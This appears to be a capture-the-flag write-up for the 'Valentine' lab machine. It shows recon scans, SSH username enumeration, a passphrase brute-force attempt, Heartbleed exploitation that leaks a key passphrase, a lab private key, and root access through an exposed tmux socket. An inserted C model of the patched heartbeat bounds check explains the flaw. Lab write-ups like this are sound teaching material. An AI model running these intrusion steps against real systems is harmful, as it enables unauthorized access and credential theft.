SYNOPSIS
Valentine is a unique medium-difficulty machine that focuses on the Heartbleed vulnerability (CVE-2014-0160), which had a devastating impact on systems across the globe.
Recon
nmap
```
└─$ nmap 10.10.10.79 -T5 -p- -sV -A -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-15 12:53 CEST
Warning: 10.10.10.79 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.79
Host is up (0.040s latency).
Not shown: 65197 closed tcp ports (conn-refused), 335 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_ssl-date: 2022-09-15T10:56:26+00:00; 0s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
We face a Linux machine running an HTTP and an HTTPS server (Apache 2.2.22) and an SSH server (OpenSSH 5.9p1).
dirbuster
Running a dirbuster scan, we found some files.
[Image: Result of the dirbuster scan]
Among them, http://10.10.10.79/dev/hype_key contains a base64 encoded private key.
```
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
[...]
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----
```
This private key may be the one authorized on the SSH server; if so, we can use it to log in.
Finding vulnerabilities
Running searchsploit against the SSH version, we found that it is vulnerable to username enumeration.
```
└─$ searchsploit ssh 5.9
--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 | Path
--------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                       | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                 | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                   | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                         | linux/remote/45001.py
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading       | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                           | linux/remote/45939.py
--------------------------------------------------------------- ---------------------------------
```
Get the username
First I need to find the user who owns the key. The file's name is hype_key, so I tried the exploit with the username hype.
```
└─$ python2 45939.py 10.10.10.79 hype
[+] hype is a valid username
```
We got our user: hype!
Trying to connect into SSH
We have a key and a user, so let's try to connect to the SSH server!
```
└─$ ssh -i tmp/hype hype@10.10.10.79
Enter passphrase for key 'tmp/hype':
```
But we are asked for the key's passphrase, which we don't have. I tried to brute-force the passphrase using john.
```
└─$ ssh2john hype > hash
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
0g 0:00:00:04 DONE (2022-09-15 16:16) 0g/s 3266Kp/s 3266Kc/s 3266KC/s a6_123..*7¡Vamos!
Session completed.
```
I was unable to recover the passphrase: rockyou.txt does not contain it.
SSL Vulnerability
Running nmap's vulnerability scripts, we found that the OpenSSL version used by the server is vulnerable to Heartbleed.
```
└─$ nmap 10.10.10.79 --script "vuln" -p 22,80,443
[...]
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability ...
|     State: VULNERABLE
|     Risk factor: High
[...]
```
The Heartbleed vulnerability allows an attacker to leak server memory via crafted heartbeat packets that trigger a buffer over-read: the server trusts the payload length declared in the request and copies that many bytes back, regardless of how many bytes were actually sent.
I tried to exploit Heartbleed using scripts found on GitHub. With one of them, I recovered a string from memory.
```
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==R..c]......-m.h....V
```
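To make the over-read concrete, here is an added C model of a heartbeat handler's bounds check (an illustration written for this writeup, not OpenSSL's code; the record layout follows RFC 6520 and the length check mirrors the one OpenSSL 1.0.1g added, while good_req and oversized_req are constructed sample records). A request that declares more payload than it carries is discarded instead of being echoed back from memory.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define HB_REQUEST     1
#define HB_RESPONSE    2
#define HB_MIN_PADDING 16   /* RFC 6520: at least 16 bytes of padding */

/* Build the HeartbeatResponse for one received HeartbeatMessage record.
 * Returns the response length, or 0 when the record is silently discarded.
 * The second length check is the one OpenSSL lacked before 1.0.1g: without
 * it, memcpy reads 'payload' bytes past the end of the received record, so
 * a tiny request declaring 65535 bytes is answered with ~64 KiB of heap. */
size_t heartbeat_respond(const uint8_t *rec, size_t rec_len,
                         uint8_t *out, size_t out_cap)
{
    /* Nothing can be trusted until type + length + minimum padding are in. */
    if (rec_len < 1 + 2 + HB_MIN_PADDING)
        return 0;
    uint8_t type    = rec[0];
    size_t  payload = ((size_t)rec[1] << 8) | rec[2];   /* declared length */

    /* Declared payload (plus padding) must fit in what was actually received. */
    if (1 + 2 + payload + HB_MIN_PADDING > rec_len)
        return 0;                       /* discard, per RFC 6520 section 4 */
    if (type != HB_REQUEST)
        return 0;

    size_t resp_len = 1 + 2 + payload + HB_MIN_PADDING;
    if (resp_len > out_cap)
        return 0;
    out[0] = HB_RESPONSE;
    out[1] = (uint8_t)(payload >> 8);
    out[2] = (uint8_t)(payload & 0xff);
    memcpy(out + 3, rec + 3, payload);            /* echo only bytes the peer sent */
    memset(out + 3 + payload, 0, HB_MIN_PADDING); /* real TLS uses random padding */
    return resp_len;
}

/* Constructed sample records (not captured traffic): 24 and 20 bytes long. */
static const uint8_t good_req[] = { HB_REQUEST, 0x00, 0x05, 'h', 'e', 'l', 'l', 'o',
                                    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
/* Declares 65535 bytes of payload but carries only one. */
static const uint8_t oversized_req[] = { HB_REQUEST, 0xFF, 0xFF, 'x',
                                         0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };

/* Convenience wrapper: response length for a record, using a scratch buffer. */
size_t respond_len(const uint8_t *rec, size_t rec_len)
{
    static uint8_t out[3 + 65535 + HB_MIN_PADDING];
    return heartbeat_respond(rec, rec_len, out, sizeof out);
}
```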
It is a base64-encoded string that decodes to heartbleedbelievethehype. I tried to log in to the SSH server with hype:heartbleedbelievethehype as a password, but it didn't work.
First shell as hype
Then I retried connecting with the private key we found earlier, using heartbleedbelievethehype as the passphrase.
```
└─$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i tmp/hype hype@10.10.10.79
hype@Valentine:~$ cat user.txt
*************************a4b2f4c
```
We got our first shell! We can grab the user flag :)
Path to the privesc
Searching the home directory, we found some commands in the .bash_history file.
```
hype@Valentine:~$ cat .bash_history
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
[...]
tmux -S /.devs/dev_sess
```
We found several tmux commands. Running the last one attaches us to the tmux server listening on the socket /.devs/dev_sess, and we land in a root shell!
```
hype@Valentine:~$ tmux -S /.devs/dev_sess
root@Valentine:/home/hype# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/home/hype# cat /root/root.txt
**************************9db6a0
```
We can get the root flag :)
External, SSL, Penetration Tester Level 2, CVE Exploitation, CVE-2014-0160, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Weak Permissions, CVE-2016-5195, Session Handling